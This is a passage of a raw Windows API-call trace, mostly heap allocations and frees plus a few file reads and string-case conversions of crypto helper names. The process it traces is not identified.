returned 1 [0039.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0039.716] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0039.716] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0039.718] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x2195, lpOverlapped=0x0) returned 1 [0039.719] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0039.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12195) returned 0xac0018 [0039.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0039.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0039.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12195) returned 0xad21b8 [0039.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0039.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.721] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0039.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12195) returned 0xac0018 [0039.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0039.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0039.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.721] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0039.721] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.721] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0039.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12195) returned 0xac0018 [0039.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0039.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0039.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0039.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc70 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0039.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12195) returned 0x935008 [0039.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0039.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.725] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0039.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0039.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0039.725] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0039.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0039.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.725] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0039.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0039.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3e8 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0039.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ad8 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.726] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0039.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0039.726] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0039.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0039.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0039.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0039.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0039.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0039.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0039.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0039.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.727] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0039.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0039.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0039.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0039.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0039.728] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0039.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0039.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0039.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0039.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cec8 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.729] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0039.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0039.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0039.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0039.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.730] RtlAllocateHeap 